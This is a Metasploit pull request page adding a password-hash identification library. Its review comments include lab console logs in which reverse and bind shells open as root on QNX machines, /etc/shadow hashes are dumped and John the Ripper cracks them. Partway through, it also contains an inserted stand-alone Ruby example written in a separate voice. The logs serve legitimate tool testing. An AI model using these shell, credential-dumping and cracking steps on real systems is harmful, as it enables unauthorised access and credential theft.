create hash identifier library #11622

Merged
merged 2 commits into from Mar 26, 2019
Conversation

@h00die
Contributor

h00die commented Mar 23, 2019

#11335 (comment)

This PR takes code from a few post libraries that pull hashes and need to identify which type of hash they are, to then get the jtr format, and puts it in a library.
It also adds qnx hash identification and output (untested).

This is not meant to be an all-in-one solution the way hash-id or hash-identifier are; this just centralizes the few hash types we actually have modules to deal with (and are non-replayable hashes, as opposed to nt/lm or postgres).

  • @bcoles if you have a qnx you could hashdump, then run a `creds -o qnx.jtr`; it should output them in a jtr-friendly way. Please verify. I did not add it to the linux cracker module.
msf5 post(linux/gather/hashdump) > run

[+] ubuntu:$6$s/P86y1v$3iCYV5UoCwcxqmEns.LoC8WNahnwdNNCwABJ9vNzOY5bR2INug.ErrKZpG6LL06KxD7I5292iJpbxIna3pjKH.:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20190323140036_default_192.168.2.139_linux.hashes_617066.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host           origin         service       public              private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
----           ------         -------       ------              -------                                                                                                                                                                                                                                                               -----  ------------        ----------
               111.111.1.111                ubuntu              $6$s/P86y1v$3iCYV5UoCwcxqmEns.LoC8WNahnwdNNCwABJ9vNzOY5bR2INug.ErrKZpG6LL06KxD7I5292iJpbxIna3pjKH.                                                                                                                                                                           Nonreplayable hash  sha512,crypt

@h00die h00die added the library label Mar 23, 2019
@wvu-r7

Member

wvu-r7 commented Mar 23, 2019

Nice effort! I'd like to see this one grow for sure.

@bcoles

Contributor

bcoles commented Mar 24, 2019

Output for QNX (using post/linux/gather/hashdump) below. The hashes in /etc/shadow were not in the old QNX format. I tried to force QNXCRYPT but it didn't work as expected.

QNX 6.5 SP1

# ./msfconsole 
[-] ***rting the Metasploit Framework console...\
[-] * WARNING: No database support: No database YAML file
[-] ***
                                                  
  LOGON: Help Logon

  HELP NOT AVAILABLE


  LOGON: Help Games

  'GAMES' REFERS TO MODELS, SIMULATIONS AND GAMES
  WHICH HAVE TACTICAL AND STRATEGIC APPLICATIONS.

  List of Games
  FALKEN'S MAZE
  BLACK JACK           .=======================.
  GIN RUMMY           |                         |
  HEARTS              |  SHALL WE PLAY A GAME ? |
  BRIDGE              |                         |
  CHECKERS             '======================='
  CHESS
  POKER
  FIGHTER COMBAT
  GUERRILLA ENGAGEMENT
  DESERT WARFARE
  AIR-TO-GROUND ACTIONS
  THEATERWIDE TACTICAL WARFARE
  THEATERWIDE BIOTOXIC AND CHEMICAL WARFARE

  GLOBAL THERMONUCLEAR WAR

  LOGON: JOSHUA


       =[ metasploit v5.0.14-dev-6218d8920d               ]
+ -- --=[ 1883 exploits - 1064 auxiliary - 329 post       ]
+ -- --=[ 553 payloads - 44 encoders - 10 nops            ]
+ -- --=[ 2 evasion                                       ]

msf5 > db_connect msf:msf@127.0.0.1/msf
Connected to Postgres data service: 127.0.0.1/msf
msf5 > use exploit/multi/handler 
msf5 exploit(multi/handler) > set rhost 172.16.191.216
rhost => 172.16.191.216
msf5 exploit(multi/handler) > set payload cmd/unix/bind_awk 
payload => cmd/unix/bind_awk
msf5 exploit(multi/handler) > run

[*] Started bind TCP handler against 172.16.191.216:4444
[*] Command shell session 1 opened (172.16.191.165:33845 -> 172.16.191.216:4444) at 2019-03-24 00:11:42 -0400

id
uid=0(root) gid=0(root) groups=0(root),1(bin),3(sys),4(adm),5(tty)
bkd> uname -a
QNX localhost 6.5.0 2012/06/20-13:50:50EDT x86pc x86
bkd> ^Z
Background session 1? [y/N]  y

msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format
----  ------  -------  ------  -------  -----  ------------  ----------

msf5 post(linux/gather/hashdump) > set session 1
session => 1
msf5 post(linux/gather/hashdump) > set verbose true
verbose => true
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] Shadow saved in: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.shadow_593610.txt
[+] passwd saved in: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.passwd_269314.txt
[+] root:4342xvyAHj.vg:0:0:Superuser:/root:/bin/sh
[+] test:M5AxUe/dgZLy2:100:100:test:/home/test:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt
[*] exec: cat /root/.msf4/loot/20190324001204_default_172.16.191.216_linux.hashes_464175.txt

root:4342xvyAHj.vg:0:0:Superuser:/root:/bin/sh
test:M5AxUe/dgZLy2:100:100:test:/home/test:/bin/sh
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.216           root    4342xvyAHj.vg         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           test    M5AxUe/dgZLy2         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:15) 200.0g/s 51100p/s 51200c/s 51200C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed

QNX 6.5

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.191.165:4444 
[*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.217:65530) at 2019-03-24 00:26:41 -0400

id
uid=0(root) gid=0(root) groups=0(root),1(bin),3(sys),4(adm),5(tty)
uname -a
QNX localhost 6.5.0 2010/07/09-14:43:25EDT x86pc x86
^Z
Background session 2? [y/N]  y

msf5 exploit(multi/handler) > use post/linux/gather/hashdump 
msf5 post(linux/gather/hashdump) > set session 2
session => 2
msf5 post(linux/gather/hashdump) > set verbose true
verbose => true
msf5 post(linux/gather/hashdump) > run

[!] SESSION may not be compatible with this module.
[+] Shadow saved in: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.shadow_900314.txt
[+] passwd saved in: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.passwd_350778.txt
[+] root:KGETopRxmES7Q:0:0:Superuser:/root:/bin/sh
[+] test:PIzPiIhlhCr9o:100:100:test:/home/test:/bin/sh
[+] Unshadowed Password File: /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt
[*] exec: cat /root/.msf4/loot/20190324002709_default_172.16.191.247_linux.hashes_933957.txt

root:KGETopRxmES7Q:0:0:Superuser:/root:/bin/sh
test:PIzPiIhlhCr9o:100:100:test:/home/test:/bin/sh
msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.247           root    KGETopRxmES7Q         Nonreplayable hash  des,bsdi,crypt
      172.16.191.247           test    PIzPiIhlhCr9o         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:27) 200.0g/s 51100p/s 51200c/s 51200C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed
msf5 post(linux/gather/hashdump) > 

The good news is that the export to JtR format worked, and John successfully cracked them - although further tests revealed JtR didn't crack one hash, for reasons which I didn't bother to explore:

msf5 post(linux/gather/hashdump) > creds
Credentials
===========

host  origin          service  public  private        realm  private_type        JtR Format
----  ------          -------  ------  -------        -----  ------------        ----------
      172.16.191.216           root    4342xvyAHj.vg         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           test    M5AxUe/dgZLy2         Nonreplayable hash  des,bsdi,crypt
      172.16.191.216           user    RSWn2JO}}mDx3         Nonreplayable hash  des,bsdi,crypt

msf5 post(linux/gather/hashdump) > creds -o qnx.jtr
[*] Wrote creds to /root/Desktop/metasploit-framework/qnx.jtr
msf5 post(linux/gather/hashdump) > john --format=qnx /root/Desktop/metasploit-framework/qnx.jtr 
[*] exec: john --format=qnx /root/Desktop/metasploit-framework/qnx.jtr 

Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
msf5 post(linux/gather/hashdump) > john /root/Desktop/metasploit-framework/qnx.jtr 
[*] exec: john /root/Desktop/metasploit-framework/qnx.jtr 

Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (descrypt, traditional crypt(3) [DES 256/256 AVX2-16])
Proceeding with single, rules:Wordlist
Press 'q' or Ctrl-C to abort, almost any other key for status
test             (test)
toor             (root)
2g 0:00:00:00 DONE 1/3 (2019-03-24 00:44) 100.0g/s 25550p/s 25600c/s 25600C/s root..*root
Use the "--show" option to display all of the cracked passwords reliably
Session completed
msf5 post(linux/gather/hashdump) > 

Note the password for user `user` was not identified or cracked by John. I'm using John from Kali packages, rather than jumbo bleeding edge, which may or may not be an issue.

Either way, the issue appears to lie with John or myself, not this PR.
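The flow the PR description gives (identify each dumped hash, attach the JtR format label, export `user:hash` lines) and the hash John skipped in the last run above, as an added example. This is not the PR's library code or Metasploit's API; it is a stand-alone sketch that reproduces only the two labels visible in the `creds` output on this page (`sha512,crypt` for `$6$` and `des,bsdi,crypt` for 13-character traditional crypt), leaves the PR's QNX-specific detection out because no QNX-format sample appears on the page, and adds one check worth having in any such identifier: traditional crypt(3) output is drawn from `[a-zA-Z0-9./]`, so `RSWn2JO}}mDx3` (which contains `}`) cannot be a descrypt hash and should be reported as unrecognised rather than labelled and silently dropped by John. The `user`, `daemon` and malformed lines in the sample are constructed; the other lines are taken from the output above.

```ruby
# Added example, not the PR's library code: a small hash identifier in the
# style the PR description gives, plus the step that turns unshadowed passwd
# lines into a JtR-friendly export. Format labels follow the `creds` output
# on the page; the crypt alphabet is the one john enforces for descrypt.
module HashIdExample
  # Traditional crypt(3) (descrypt): exactly 13 chars, 2-char salt first,
  # every char from [a-zA-Z0-9./].
  DES_CRYPT = /\A[a-zA-Z0-9.\/]{13}\z/

  # Map a raw hash field to the JtR format label used on the page, or nil when
  # the field is locked/empty or not a hash we recognise.
  def self.identify(hash)
    h = hash.to_s.strip
    return nil if h.empty? || h.start_with?('!', '*')
    return 'sha512,crypt'   if h.start_with?('$6$')
    return 'des,bsdi,crypt' if DES_CRYPT.match?(h)
    nil
  end

  # Parse one unshadowed passwd line (user:hash:uid:gid:gecos:home:shell).
  # Returns nil on malformed input instead of guessing at fields.
  def self.parse_passwd_line(line)
    fields = line.chomp.split(':', -1)
    return nil unless fields.length == 7
    user, hash, uid, gid, gecos, home, shell = fields
    { user: user, hash: hash, uid: uid.to_i, gid: gid.to_i,
      gecos: gecos, home: home, shell: shell }
  end

  # Build the JtR export: one "user:hash" line per identified hash, plus a list
  # of skipped entries with a reason, so nothing disappears silently the way
  # the unloaded hash did in the john run above.
  def self.to_jtr(lines)
    out = []
    skipped = []
    lines.each do |line|
      entry = parse_passwd_line(line)
      if entry.nil?
        skipped << [line.chomp, 'malformed passwd line']
        next
      end
      fmt = identify(entry[:hash])
      if fmt.nil?
        skipped << [entry[:user], 'unrecognised hash (outside the crypt alphabet or locked account)']
        next
      end
      out << "#{entry[:user]}:#{entry[:hash]}"
    end
    [out, skipped]
  end

  # Sample input. root/test/ubuntu lines are copied from the page; the user
  # line wraps the page's third hash in constructed passwd fields; daemon and
  # the trailing malformed line are constructed.
  SAMPLE_LINES = [
    'root:4342xvyAHj.vg:0:0:Superuser:/root:/bin/sh',
    'test:M5AxUe/dgZLy2:100:100:test:/home/test:/bin/sh',
    'user:RSWn2JO}}mDx3:101:101:user:/home/user:/bin/sh',
    'ubuntu:$6$s/P86y1v$3iCYV5UoCwcxqmEns.LoC8WNahnwdNNCwABJ9vNzOY5bR2INug.ErrKZpG6LL06KxD7I5292iJpbxIna3pjKH.:1000:1000:ubuntu,,,:/home/ubuntu:/bin/bash',
    'daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin',
    'broken line without enough fields',
  ].freeze
end

if __FILE__ == $0
  out, skipped = HashIdExample.to_jtr(HashIdExample::SAMPLE_LINES)
  puts out
  skipped.each { |who, why| warn "skipped #{who}: #{why}" }
end
```

Running the file prints three JtR-ready lines (root, test, ubuntu) and warns about `user`, `daemon` and the malformed line; the `skipped` list is what a cracker module would surface to the operator so an unloaded hash is visible before john is ever invoked.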

@busterb busterb self-assigned this Mar 26, 2019
@busterb busterb added the enhancement label Mar 26, 2019
@busterb

Member

busterb commented Mar 26, 2019

LGTM, thanks @h00die

@busterb busterb merged commit 656ea52 into rapid7:master Mar 26, 2019
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Metasploit Automation - Test Execution Successfully completed all tests.
continuous-integration/travis-ci/pr The Travis CI build passed
busterb added a commit that referenced this pull request Mar 26, 2019
@busterb

Member

busterb commented Mar 26, 2019

Release Notes

This merges common code for identifying password hashes, sharing it between various password cracking modules and simultaneously adding additional hash support.

@jmartin-r7 jmartin-r7 added the msf5 label Mar 26, 2019
@jmartin-r7

Member

jmartin-r7 commented Mar 26, 2019

This also interacts with files updated in jtr modernization, marking msf5.

@h00die h00die deleted the h00die:qnx branch Apr 12, 2019